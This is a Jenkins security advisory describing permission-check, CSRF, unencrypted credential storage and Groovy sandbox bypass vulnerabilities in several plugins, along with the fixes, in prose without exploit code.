This advisory announces vulnerabilities in the following Jenkins deliverables:
gitlab-plugin
GitLab Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.
Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.
This form validation method now requires POST requests and Overall/Administer permissions.
jira-ext
jira-ext Plugin stored credentials unencrypted in its global configuration file hudson.plugins.jira.JiraProjectProperty.xml
on the Jenkins controller.
These credentials could be viewed by users with access to the Jenkins controller file system.
jira-ext Plugin now stores credentials encrypted.
azure-publishersettings-credentials
Azure PublisherSettings Credentials Plugin stored the service management certificate unencrypted in credentials.xml
on the Jenkins controller.
These credentials could be viewed by users with access to the Jenkins controller file system.
Azure PublisherSettings Credentials Plugin has been deprecated. Azure PublisherSettings Credentials Plugin 1.5 no longer provides any user features and we recommend the plugin be uninstalled.
deployit-plugin
A missing permission check in a form validation method in XebiaLabs XL Deploy Plugin allows users with Overall/Read permission to initiate a connection test to an attacker-specified server with attacker-specified credentials.
Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.
ontrack
ontrack Jenkins Plugin supports sandboxed Groovy expressions. Its sandbox protection could be circumvented during parsing, compilation, and script instantiation by providing a crafted Groovy script.
This allowed users able to control the plugin’s job-specific configuration to bypass the sandbox protection and execute arbitrary code on the Jenkins controller.
ontrack Jenkins Plugin now uses Script Security APIs that apply sandbox protection during these phases.
These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.
As of publication of this advisory, no fixes are available for the following plugins:
Learn why we announce these issues.
The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities: